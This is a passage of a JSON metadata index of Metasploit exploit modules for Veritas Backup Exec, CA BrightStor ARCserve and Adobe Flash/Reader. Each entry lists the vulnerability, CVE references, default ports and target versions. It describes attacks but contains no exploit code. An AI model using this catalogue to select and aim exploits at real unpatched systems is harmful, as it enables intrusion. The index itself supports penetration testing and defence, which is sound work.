"description": "This module exploits a stack buffer overflow in the Veritas\n BackupExec Windows Agent software. This vulnerability occurs\n when a client authentication request is received with type\n '3' and a long password argument. Reliable execution is\n obtained by abusing the stack buffer overflow to smash a SEH\n pointer.",
"references": [
"CVE-2005-0773",
"OSVDB-17624",
"BID-14022",
"URL-http://www.idefense.com/application/poi/display?id=272&type=vulnerabilities"
],
"platform": "Windows",
"arch": "",
"rport": 10000,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Veritas BE 9.0/9.1/10.0 (All Windows)",
"Veritas BE 9.0/9.1/10.0 (Windows 2000)"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/backupexec/remote_agent.rb",
"is_install_path": true,
"ref_name": "windows/backupexec/remote_agent",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/backupexec/ssl_uaf": {
"name": "Veritas/Symantec Backup Exec SSL NDMP Connection Use-After-Free",
"full_name": "exploit/windows/backupexec/ssl_uaf",
"rank": 300,
"disclosure_date": "2017-05-10",
"type": "exploit",
"author": [
"Matthew Daley"
],
"description": "This module exploits a use-after-free vulnerability in the handling of SSL NDMP\n connections in Veritas/Symantec Backup Exec's Remote Agent for Windows. When SSL\n is re-established on a NDMP connection that previously has had SSL established,\n the BIO struct for the connection's previous SSL session is reused, even though it\n has previously been freed.\n\n This module supports 3 specific versions of the Backup Exec agent in the 14, 15\n and 16 series on 64-bit and 32-bit versions of Windows and has been tested from\n Vista to Windows 10. The check command can help narrow down what major and minor\n revision is installed and the precise version of Windows, but some other\n information may be required to make a reliable choice of target.\n\n NX, ASLR and Windows 8+ anti-ROP mitigations are bypassed. On Windows 8+, it has a\n reliability of around 85%. On other versions of Windows, reliability is around 35%\n (due to the need to win a race condition across the network in this case; this may\n drop further depending on network conditions). The agent is normally installed on\n all hosts in a domain that need to be backed up, so if one service crashes, try\n again on another :) Successful exploitation will give remote code execution as the\n user of the Backup Exec Remote Agent for Windows service, almost always\n NT AUTHORITY\\SYSTEM.",
"references": [
"CVE-2017-8895",
"VTS-17-006",
"URL-https://www.veritas.com/content/support/en_US/security/VTS17-006.html"
],
"platform": "Windows",
"arch": "",
"rport": 10000,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Backup Exec 14 (14.1 / revision 9.1), Windows >= 8 x64",
"Backup Exec 14 (14.1 / revision 9.1), Windows >= 8 x86",
"Backup Exec 14 (14.1 / revision 9.1), Windows <= 7 x64",
"Backup Exec 14 (14.1 / revision 9.1), Windows <= 7 x86",
"Backup Exec 15 (14.2 / revision 9.2), Windows >= 8 x64",
"Backup Exec 15 (14.2 / revision 9.2), Windows >= 8 x86",
"Backup Exec 15 (14.2 / revision 9.2), Windows <= 7 x64",
"Backup Exec 15 (14.2 / revision 9.2), Windows <= 7 x86",
"Backup Exec 16 (16.0 / revision 9.2), Windows >= 8 x64",
"Backup Exec 16 (16.0 / revision 9.2), Windows >= 8 x86",
"Backup Exec 16 (16.0 / revision 9.2), Windows <= 7 x64",
"Backup Exec 16 (16.0 / revision 9.2), Windows <= 7 x86"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/backupexec/ssl_uaf.rb",
"is_install_path": true,
"ref_name": "windows/backupexec/ssl_uaf",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/brightstor/ca_arcserve_342": {
"name": "Computer Associates ARCserve REPORTREMOTEEXECUTECML Buffer Overflow",
"full_name": "exploit/windows/brightstor/ca_arcserve_342",
"rank": 200,
"disclosure_date": "2008-10-09",
"type": "exploit",
"author": [
"Nahuel Cayento Riva",
"MC <mc@metasploit.com>"
],
"description": "This module exploits a buffer overflow in Computer Associates BrightStor ARCserve r11.5 (build 3884).\n By sending a specially crafted RPC request to opcode 0x342, an attacker could overflow the buffer\n and execute arbitrary code. In order to successfully exploit this vulnerability, you will need\n to set the hostname argument (HNAME).",
"references": [
"BID-31684",
"OSVDB-49468",
"CVE-2008-4397",
"URL-http://crackinglandia.blogspot.com/2009/10/el-colador-de-ca-computer-associates.html"
],
"platform": "Windows",
"arch": "",
"rport": 6504,
"autofilter_ports": [
139,
445
],
"autofilter_services": [
"netbios-ssn",
"microsoft-ds"
],
"targets": [
"Computer Associates BrightStor ARCserve r11.5 (build 3884)"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/brightstor/ca_arcserve_342.rb",
"is_install_path": true,
"ref_name": "windows/brightstor/ca_arcserve_342",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/brightstor/discovery_tcp": {
"name": "CA BrightStor Discovery Service TCP Overflow",
"full_name": "exploit/windows/brightstor/discovery_tcp",
"rank": 200,
"disclosure_date": "2005-02-14",
"type": "exploit",
"author": [
"hdm <x@hdm.io>",
"aushack <patrick@osisecurity.com.au>"
],
"description": "This module exploits a vulnerability in the CA BrightStor\n Discovery Service. This vulnerability occurs when a specific\n type of request is sent to the TCP listener on port 41523.\n This vulnerability was discovered by cybertronic[at]gmx.net\n and affects all known versions of the BrightStor product.\n This module is based on the 'cabrightstor_disco' exploit by\n HD Moore.",
"references": [
"CVE-2005-2535",
"OSVDB-13814",
"BID-12536",
"URL-http://archives.neohapsis.com/archives/bugtraq/2005-02/0123.html",
"EDB-1131"
],
"platform": "Windows",
"arch": "",
"rport": 41523,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"cheyprod.dll 9/14/2000",
"cheyprod.dll 12/12/2003",
"cheyprod.dll 07/21/2004"
],
"mod_time": "2017-11-09 03:00:24 +0000",
"path": "/modules/exploits/windows/brightstor/discovery_tcp.rb",
"is_install_path": true,
"ref_name": "windows/brightstor/discovery_tcp",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/brightstor/discovery_udp": {
"name": "CA BrightStor Discovery Service Stack Buffer Overflow",
"full_name": "exploit/windows/brightstor/discovery_udp",
"rank": 200,
"disclosure_date": "2004-12-20",
"type": "exploit",
"author": [
"hdm <x@hdm.io>",
"aushack <patrick@osisecurity.com.au>"
],
"description": "This module exploits a vulnerability in the CA BrightStor\n Discovery Service. This vulnerability occurs when a large\n request is sent to UDP port 41524, triggering a stack buffer\n overflow.",
"references": [
"CVE-2005-0260",
"OSVDB-13613",
"BID-12491",
"URL-http://www.idefense.com/application/poi/display?id=194&type=vulnerabilities"
],
"platform": "Windows",
"arch": "",
"rport": 41524,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"cheyprod.dll 12/12/2003",
"cheyprod.dll 07/21/2004"
],
"mod_time": "2017-11-09 03:00:24 +0000",
"path": "/modules/exploits/windows/brightstor/discovery_udp.rb",
"is_install_path": true,
"ref_name": "windows/brightstor/discovery_udp",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/brightstor/etrust_itm_alert": {
"name": "Computer Associates Alert Notification Buffer Overflow",
"full_name": "exploit/windows/brightstor/etrust_itm_alert",
"rank": 200,
"disclosure_date": "2008-04-04",
"type": "exploit",
"author": [
"MC <mc@metasploit.com>"
],
"description": "This module exploits a buffer overflow in Computer Associates Threat Manager for the Enterprise r8.1.\n By sending a specially crafted RPC request, an attacker could overflow the buffer and execute arbitrary code.\n In order to successfully exploit this vulnerability, you will need valid logon credentials to the target.",
"references": [
"CVE-2007-4620",
"OSVDB-44040",
"BID-28605"
],
"platform": "Windows",
"arch": "",
"rport": 445,
"autofilter_ports": [
139,
445
],
"autofilter_services": [
"netbios-ssn",
"microsoft-ds"
],
"targets": [
"Windows 2003 SP0 English",
"Windows 2000 SP4 English",
"CA BrightStor ARCServe Backup 11.5 / Windows 2000 SP4 English"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/brightstor/etrust_itm_alert.rb",
"is_install_path": true,
"ref_name": "windows/brightstor/etrust_itm_alert",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/brightstor/hsmserver": {
"name": "CA BrightStor HSM Buffer Overflow",
"full_name": "exploit/windows/brightstor/hsmserver",
"rank": 500,
"disclosure_date": "2007-09-27",
"type": "exploit",
"author": [
"toto"
],
"description": "This module exploits one of the multiple stack buffer overflows in Computer Associates BrightStor HSM.\n By sending a specially crafted request, an attacker could overflow the buffer and execute arbitrary code.",
"references": [
"CVE-2007-5082",
"OSVDB-41363",
"BID-25823"
],
"platform": "Windows",
"arch": "",
"rport": 2000,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"BrightStor HSM 11.5 Windows All"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/brightstor/hsmserver.rb",
"is_install_path": true,
"ref_name": "windows/brightstor/hsmserver",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/brightstor/lgserver": {
"name": "CA BrightStor ARCserve for Laptops and Desktops LGServer Buffer Overflow",
"full_name": "exploit/windows/brightstor/lgserver",
"rank": 200,
"disclosure_date": "2007-01-31",
"type": "exploit",
"author": [
"MC <mc@metasploit.com>"
],
"description": "This module exploits a stack buffer overflow in Computer Associates BrightStor ARCserve Backup\n for Laptops & Desktops 11.1. By sending a specially crafted request, an attacker could\n overflow the buffer and execute arbitrary code.",
"references": [
"CVE-2007-0449",
"OSVDB-31593",
"BID-22342"
],
"platform": "Windows",
"arch": "",
"rport": 1900,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows 2000 Pro English All"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/brightstor/lgserver.rb",
"is_install_path": true,
"ref_name": "windows/brightstor/lgserver",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/brightstor/lgserver_multi": {
"name": "CA BrightStor ARCserve for Laptops and Desktops LGServer Multiple Commands Buffer Overflow",
"full_name": "exploit/windows/brightstor/lgserver_multi",
"rank": 200,
"disclosure_date": "2007-06-06",
"type": "exploit",
"author": [
"MC <mc@metasploit.com>"
],
"description": "This module exploits a stack buffer overflow in Computer Associates BrightStor ARCserve Backup\n for Laptops & Desktops 11.1. By sending a specially crafted request to multiple commands,\n an attacker could overflow the buffer and execute arbitrary code.",
"references": [
"CVE-2007-3216",
"OSVDB-35329",
"BID-24348"
],
"platform": "Windows",
"arch": "",
"rport": 1900,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows 2000 SP4 English"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/brightstor/lgserver_multi.rb",
"is_install_path": true,
"ref_name": "windows/brightstor/lgserver_multi",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/brightstor/lgserver_rxrlogin": {
"name": "CA BrightStor ARCserve for Laptops and Desktops LGServer Buffer Overflow",
"full_name": "exploit/windows/brightstor/lgserver_rxrlogin",
"rank": 200,
"disclosure_date": "2007-06-06",
"type": "exploit",
"author": [
"MC <mc@metasploit.com>"
],
"description": "This module exploits a stack buffer overflow in Computer Associates BrightStor ARCserve Backup\n for Laptops & Desktops 11.1. By sending a specially crafted request, an attacker could\n overflow the buffer and execute arbitrary code.",
"references": [
"CVE-2007-5003",
"OSVDB-41353",
"BID-24348"
],
"platform": "Windows",
"arch": "",
"rport": 1900,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows 2003 SP0 English",
"Windows 2000 SP4 English"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/brightstor/lgserver_rxrlogin.rb",
"is_install_path": true,
"ref_name": "windows/brightstor/lgserver_rxrlogin",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/brightstor/lgserver_rxssetdatagrowthscheduleandfilter": {
"name": "CA BrightStor ARCserve for Laptops and Desktops LGServer rxsSetDataGrowthScheduleAndFilter Buffer Overflow",
"full_name": "exploit/windows/brightstor/lgserver_rxssetdatagrowthscheduleandfilter",
"rank": 200,
"disclosure_date": "2007-06-06",
"type": "exploit",
"author": [
"MC <mc@metasploit.com>"
],
"description": "This module exploits a stack buffer overflow in Computer Associates BrightStor ARCserve Backup\n for Laptops & Desktops 11.1. By sending a specially crafted request (rxsSetDataGrowthScheduleAndFilter),\n an attacker could overflow the buffer and execute arbitrary code.",
"references": [
"CVE-2007-3216",
"OSVDB-35329",
"BID-24348"
],
"platform": "Windows",
"arch": "",
"rport": 1900,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows 2000 SP4 English"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/brightstor/lgserver_rxssetdatagrowthscheduleandfilter.rb",
"is_install_path": true,
"ref_name": "windows/brightstor/lgserver_rxssetdatagrowthscheduleandfilter",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/brightstor/lgserver_rxsuselicenseini": {
"name": "CA BrightStor ARCserve for Laptops and Desktops LGServer Buffer Overflow",
"full_name": "exploit/windows/brightstor/lgserver_rxsuselicenseini",
"rank": 200,
"disclosure_date": "2007-06-06",
"type": "exploit",
"author": [
"MC <mc@metasploit.com>"
],
"description": "This module exploits a stack buffer overflow in Computer Associates BrightStor ARCserve Backup\n for Laptops & Desktops 11.1. By sending a specially crafted request (rxsUseLicenseIni), an\n attacker could overflow the buffer and execute arbitrary code.",
"references": [
"CVE-2007-3216",
"OSVDB-35329",
"BID-24348"
],
"platform": "Windows",
"arch": "",
"rport": 1900,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows 2003 SP0 English",
"Windows 2000 SP4 English"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/brightstor/lgserver_rxsuselicenseini.rb",
"is_install_path": true,
"ref_name": "windows/brightstor/lgserver_rxsuselicenseini",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/brightstor/license_gcr": {
"name": "CA BrightStor ARCserve License Service GCR NETWORK Buffer Overflow",
"full_name": "exploit/windows/brightstor/license_gcr",
"rank": 200,
"disclosure_date": "2005-03-02",
"type": "exploit",
"author": [
"MC <mc@metasploit.com>"
],
"description": "This module exploits a stack buffer overflow in Computer Associates BrightStor ARCserve Backup 11.0.\n By sending a specially crafted request to the lic98rmtd.exe service, an attacker\n could overflow the buffer and execute arbitrary code.",
"references": [
"CVE-2005-0581",
"OSVDB-14389",
"BID-12705"
],
"platform": "Windows",
"arch": "",
"rport": 10202,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows 2003 SP0 English",
"Windows 2000 SP4 English"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/brightstor/license_gcr.rb",
"is_install_path": true,
"ref_name": "windows/brightstor/license_gcr",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/brightstor/mediasrv_sunrpc": {
"name": "CA BrightStor ArcServe Media Service Stack Buffer Overflow",
"full_name": "exploit/windows/brightstor/mediasrv_sunrpc",
"rank": 200,
"disclosure_date": "2007-04-25",
"type": "exploit",
"author": [
"toto"
],
"description": "This exploit targets a stack buffer overflow in the MediaSrv RPC service of CA\n BrightStor ARCserve. By sending a specially crafted SUNRPC request, an attacker\n can overflow a stack buffer and execute arbitrary code.",
"references": [
"CVE-2007-2139",
"OSVDB-35326",
"BID-23635",
"ZDI-07-022"
],
"platform": "Windows",
"arch": "",
"rport": 111,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"BrightStor Arcserve 9.0 (?) - 11.5 SP2 (Windows 2000)",
"BrightStor Arcserve 9.0 (?) - 11.5 SP2 (Windows 2003)",
"BrightStor Arcserve 11.1 - 11.5 SP2 (Windows All - NX Support)"
],
"mod_time": "2017-09-08 22:19:55 +0000",
"path": "/modules/exploits/windows/brightstor/mediasrv_sunrpc.rb",
"is_install_path": true,
"ref_name": "windows/brightstor/mediasrv_sunrpc",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/brightstor/message_engine": {
"name": "CA BrightStor ARCserve Message Engine Buffer Overflow",
"full_name": "exploit/windows/brightstor/message_engine",
"rank": 200,
"disclosure_date": "2007-01-11",
"type": "exploit",
"author": [
"MC <mc@metasploit.com>",
"aushack <patrick@osisecurity.com.au>"
],
"description": "This module exploits a buffer overflow in Computer Associates BrightStor ARCserve Backup\n 11.1 - 11.5 SP2. By sending a specially crafted RPC request, an attacker could overflow\n the buffer and execute arbitrary code.",
"references": [
"CVE-2007-0169",
"OSVDB-31318",
"BID-22005"
],
"platform": "Windows",
"arch": "",
"rport": 6503,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"BrightStor ARCserve r11.1",
"BrightStor ARCserve r11.5",
"BrightStor ARCserve r11.5 SP2"
],
"mod_time": "2017-11-09 03:00:24 +0000",
"path": "/modules/exploits/windows/brightstor/message_engine.rb",
"is_install_path": true,
"ref_name": "windows/brightstor/message_engine",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/brightstor/message_engine_72": {
"name": "CA BrightStor ARCserve Message Engine 0x72 Buffer Overflow",
"full_name": "exploit/windows/brightstor/message_engine_72",
"rank": 200,
"disclosure_date": "2010-10-04",
"type": "exploit",
"author": [
"MC <mc@metasploit.com>"
],
"description": "This module exploits a buffer overflow in Computer Associates BrightStor ARCserve Backup\n 11.1 - 11.5 SP2. By sending a specially crafted RPC request, an attacker could overflow\n the buffer and execute arbitrary code.",
"references": [
"OSVDB-68329",
"URL-http://www.metasploit.com/users/mc"
],
"platform": "Windows",
"arch": "",
"rport": 6504,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"BrightStor ARCserve r11.5/Windows 2003"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/brightstor/message_engine_72.rb",
"is_install_path": true,
"ref_name": "windows/brightstor/message_engine_72",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/brightstor/message_engine_heap": {
"name": "CA BrightStor ARCserve Message Engine Heap Overflow",
"full_name": "exploit/windows/brightstor/message_engine_heap",
"rank": 200,
"disclosure_date": "2006-10-05",
"type": "exploit",
"author": [
"MC <mc@metasploit.com>"
],
"description": "This module exploits a heap overflow in Computer Associates BrightStor ARCserve Backup\n 11.5. By sending a specially crafted RPC request, an attacker could overflow the\n buffer and execute arbitrary code.",
"references": [
"CVE-2006-5143",
"OSVDB-29533",
"BID-20365"
],
"platform": "Windows",
"arch": "",
"rport": 6503,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows 2000 SP4 English"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/brightstor/message_engine_heap.rb",
"is_install_path": true,
"ref_name": "windows/brightstor/message_engine_heap",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/brightstor/sql_agent": {
"name": "CA BrightStor Agent for Microsoft SQL Overflow",
"full_name": "exploit/windows/brightstor/sql_agent",
"rank": 200,
"disclosure_date": "2005-08-02",
"type": "exploit",
"author": [
"hdm <x@hdm.io>"
],
"description": "This module exploits a vulnerability in the CA BrightStor\n Agent for Microsoft SQL Server. This vulnerability was\n discovered by cybertronic[at]gmx.net.",
"references": [
"CVE-2005-1272",
"OSVDB-18501",
"BID-14453",
"URL-http://www.idefense.com/application/poi/display?id=287&type=vulnerabilities",
"URL-http://www3.ca.com/securityadvisor/vulninfo/vuln.aspx?id=33239"
],
"platform": "Windows",
"arch": "",
"rport": 6070,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"ARCServe 11.0 Asbrdcst.dll 12/12/2003",
"ARCServe 11.1 Asbrdcst.dll 07/21/2004",
"ARCServe 11.1 SP1 Asbrdcst.dll 01/14/2005",
"Windows 2000 SP0-SP3 English",
"Windows 2000 SP4 English",
"Windows XP SP0-SP1 English",
"Windows XP SP2 English",
"Windows 2003 SP0 English",
"Windows 2003 SP1 English"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/brightstor/sql_agent.rb",
"is_install_path": true,
"ref_name": "windows/brightstor/sql_agent",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/brightstor/tape_engine": {
"name": "CA BrightStor ARCserve Tape Engine Buffer Overflow",
"full_name": "exploit/windows/brightstor/tape_engine",
"rank": 200,
"disclosure_date": "2006-11-21",
"type": "exploit",
"author": [
"MC <mc@metasploit.com>",
"aushack <patrick@osisecurity.com.au>"
],
"description": "This module exploits a stack buffer overflow in Computer Associates BrightStor ARCserve Backup\n r11.1 - r11.5. By sending a specially crafted DCERPC request, an attacker could overflow\n the buffer and execute arbitrary code.",
"references": [
"CVE-2006-6076",
"OSVDB-30637",
"BID-21221",
"EDB-3086"
],
"platform": "Windows",
"arch": "",
"rport": 6502,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"BrightStor ARCserve r11.1",
"BrightStor ARCserve r11.5"
],
"mod_time": "2017-11-09 03:00:24 +0000",
"path": "/modules/exploits/windows/brightstor/tape_engine.rb",
"is_install_path": true,
"ref_name": "windows/brightstor/tape_engine",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/brightstor/tape_engine_0x8a": {
"name": "CA BrightStor ARCserve Tape Engine 0x8A Buffer Overflow",
"full_name": "exploit/windows/brightstor/tape_engine_0x8a",
"rank": 200,
"disclosure_date": "2010-10-04",
"type": "exploit",
"author": [
"MC <mc@metasploit.com>"
],
"description": "This module exploits a stack buffer overflow in Computer Associates BrightStor ARCserve Backup\n r11.1 - r11.5. By sending a specially crafted DCERPC request, an attacker could overflow\n the buffer and execute arbitrary code.",
"references": [
"OSVDB-68330",
"URL-http://www.metasploit.com/users/mc"
],
"platform": "Windows",
"arch": "",
"rport": 6502,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"BrightStor ARCserve r11.5/Windows 2003"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/brightstor/tape_engine_0x8a.rb",
"is_install_path": true,
"ref_name": "windows/brightstor/tape_engine_0x8a",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/brightstor/universal_agent": {
"name": "CA BrightStor Universal Agent Overflow",
"full_name": "exploit/windows/brightstor/universal_agent",
"rank": 200,
"disclosure_date": "2005-04-11",
"type": "exploit",
"author": [
"hdm <x@hdm.io>"
],
"description": "This module exploits a convoluted heap overflow in the CA\n BrightStor Universal Agent service. Triple userland\n exception results in heap growth and execution of\n dereferenced function pointer at a specified address.",
"references": [
"CVE-2005-1018",
"OSVDB-15471",
"BID-13102",
"URL-http://www.idefense.com/application/poi/display?id=232&type=vulnerabilities"
],
"platform": "Windows",
"arch": "",
"rport": 6050,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Magic Heap Target #1"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/brightstor/universal_agent.rb",
"is_install_path": true,
"ref_name": "windows/brightstor/universal_agent",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/adobe_cooltype_sing": {
"name": "Adobe CoolType SING Table \"uniqueName\" Stack Buffer Overflow",
"full_name": "exploit/windows/browser/adobe_cooltype_sing",
"rank": 500,
"disclosure_date": "2010-09-07",
"type": "exploit",
"author": [
"Unknown",
"sn0wfl0w",
"jduck <jduck@metasploit.com>"
],
"description": "This module exploits a vulnerability in the Smart INdependent Glyphlets (SING) table\n handling within versions 8.2.4 and 9.3.4 of Adobe Reader. Prior versions are\n assumed to be vulnerable as well.",
"references": [
"CVE-2010-2883",
"OSVDB-67849",
"URL-http://contagiodump.blogspot.com/2010/09/cve-david-leadbetters-one-point-lesson.html",
"URL-http://www.adobe.com/support/security/advisories/apsa10-02.html"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/browser/adobe_cooltype_sing.rb",
"is_install_path": true,
"ref_name": "windows/browser/adobe_cooltype_sing",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/adobe_flash_avm2": {
"name": "Adobe Flash Player Integer Underflow Remote Code Execution",
"full_name": "exploit/windows/browser/adobe_flash_avm2",
"rank": 300,
"disclosure_date": "2014-02-05",
"type": "exploit",
"author": [
"Unknown",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a vulnerability found in the ActiveX component of Adobe Flash Player\n before 12.0.0.43. By supplying a specially crafted swf file it is possible to trigger an\n integer underflow in several avm2 instructions, which can be turned into remote code\n execution under the context of the user, as exploited in the wild in February 2014. This\n module has been tested successfully with Adobe Flash Player 11.7.700.202 on Windows XP\n SP3, Windows 7 SP1 and Adobe Flash Player 11.3.372.94 on Windows 8, although it includes\n ROP chains for several Flash 11 versions, as exploited in the wild.",
"references": [
"CVE-2014-0497",
"OSVDB-102849",
"BID-65327",
"URL-http://helpx.adobe.com/security/products/flash-player/apsb14-04.html",
"URL-http://blogs.technet.com/b/mmpc/archive/2014/02/17/a-journey-to-cve-2014-0497-exploit.aspx"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/browser/adobe_flash_avm2.rb",
"is_install_path": true,
"ref_name": "windows/browser/adobe_flash_avm2",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/adobe_flash_casi32_int_overflow": {
"name": "Adobe Flash Player casi32 Integer Overflow",
"full_name": "exploit/windows/browser/adobe_flash_casi32_int_overflow",
"rank": 500,
"disclosure_date": "2014-10-14",
"type": "exploit",
"author": [
"bilou",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits an integer overflow in Adobe Flash Player. The vulnerability occurs in\n the casi32 method, where an integer overflow occurs if a ByteArray of length 0 is setup as\n domainMemory for the current application domain. This module has been tested successfully\n on Windows 7 SP1 (32-bit), IE 8 to IE 11 and Flash 15.0.0.167.",
"references": [
"ZDI-14-365",
"CVE-2014-0569",
"OSVDB-113199",
"URL-https://helpx.adobe.com/security/products/flash-player/apsb14-22.html",
"URL-http://malware.dontneedcoffee.com/2014/10/cve-2014-0569.html"
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/browser/adobe_flash_casi32_int_overflow.rb",
"is_install_path": true,
"ref_name": "windows/browser/adobe_flash_casi32_int_overflow",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/adobe_flash_copy_pixels_to_byte_array": {
"name": "Adobe Flash Player copyPixelsToByteArray Method Integer Overflow",
"full_name": "exploit/windows/browser/adobe_flash_copy_pixels_to_byte_array",
"rank": 500,
"disclosure_date": "2014-09-23",
"type": "exploit",
"author": [
"Chris Evans",
"Nicolas Joly",
"hdarwin",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits an integer overflow in Adobe Flash Player. The vulnerability occurs\n in the copyPixelsToByteArray method from the BitmapData object. The position field of the\n destination ByteArray can be used to cause an integer overflow and write contents out of\n the ByteArray buffer. This module has been tested successfully on:\n * Windows 7 SP1 (32-bit), IE 8 to IE 11 and Flash 14.0.0.176, 14.0.0.145, and 14.0.0.125.\n * Windows 7 SP1 (32-bit), Firefox 38.0.5 and Adobe Flash 14.0.0.179.\n * Windows 8.1, Firefox 38.0.5 and Adobe Flash 14.0.0.179.",
"references": [
"CVE-2014-0556",
"OSVDB-111110",
"URL-http://googleprojectzero.blogspot.com/2014/09/exploiting-cve-2014-0556-in-flash.html",
"URL-https://code.google.com/p/google-security-research/issues/detail?id=46",
"URL-http://hacklab.kr/cve-2014-0556-%EB%B6%84%EC%84%9D/",
"URL-http://malware.dontneedcoffee.com/2014/10/cve-2014-0556-adobe-flash-player.html",
"URL-https://helpx.adobe.com/security/products/flash-player/apsb14-21.html"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/browser/adobe_flash_copy_pixels_to_byte_array.rb",
"is_install_path": true,
"ref_name": "windows/browser/adobe_flash_copy_pixels_to_byte_array",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/adobe_flash_domain_memory_uaf": {
"name": "Adobe Flash Player domainMemory ByteArray Use After Free",
"full_name": "exploit/windows/browser/adobe_flash_domain_memory_uaf",
"rank": 500,
"disclosure_date": "2014-04-14",
"type": "exploit",
"author": [
"bilou",
"Unknown",
"hdarwin",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a use-after-free vulnerability in Adobe Flash Player. The\n vulnerability occurs when the ByteArray assigned to the current ApplicationDomain\n is freed from an ActionScript worker, when forcing a reallocation by copying more\n contents than the original capacity, but Flash forgets to update the domainMemory\n pointer, leading to a use-after-free situation when the main worker references the\n domainMemory again. This module has been tested successfully on Windows 7 SP1\n (32-bit), IE 8 and IE11 with Flash 17.0.0.134.",
"references": [
"CVE-2015-0359",
"URL-https://helpx.adobe.com/security/products/flash-player/apsb15-06.html",
"URL-https://www.fireeye.com/blog/threat-research/2015/04/angler_ek_exploiting.html",
